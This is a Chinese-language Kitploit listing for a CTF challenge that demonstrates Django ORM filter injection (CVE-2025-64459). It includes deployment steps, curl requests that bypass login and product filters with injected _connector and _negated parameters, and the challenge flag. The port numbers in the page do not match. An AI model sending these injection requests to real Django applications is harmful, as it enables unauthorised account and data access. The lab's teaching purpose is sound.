Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-64459 — CTF挑战,演示Django ORM过滤器注入(CVE-2025-64459),包含认证绕过和产品过滤器绕过漏洞利用,以及部署和获取标志的方法。 | Kitploit
工具/GitHubGitHub/z3yr0xx/cve-2025-64459
漏洞分析Web应用程序漏洞利用Web安全CTF学习与教育实验室与实践
GitHubz3yr0xx/cve-2025-64459

CVE-2025-64459

CTF挑战,演示Django ORM过滤器注入(CVE-2025-64459),包含认证绕过和产品过滤器绕过漏洞利用,以及部署和获取标志的方法。

查看仓库
29个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CTF挑战:Django ORM注入 (CVE-2025-64459)

分类: Web安全
难度: 中等
漏洞: CVE-2025-64459 - Django ORM过滤器注入

📝 描述

我们构建了一个带有管理面板的安全商品商店。你能绕过认证并找到私人管理员的笔记吗?

URL: http://YOUR_SERVER:6008

🚀 部署

root@kitploit:~
cd web_django_cve
docker-compose up --build -d

🎯 漏洞利用 (CVE-2025-64459)

认证绕过 (/login/)

root@kitploit:~
# 使用 _connector=OR
curl "http://HOST:8054/login/?username=admin&_connector=OR&is_superuser=True"

# 使用 _negated
curl "http://HOST:8054/login/?username=admin&_negated=True"

产品过滤器绕过 (/)

root@kitploit:~
# 取反 is_public 过滤器
curl "http://HOST:8054/?_negated=True"

# 直接访问
curl "http://HOST:8054/?is_public=False"

🏁 旗帜

lol-you-here_then-you_exploited_me

下载工具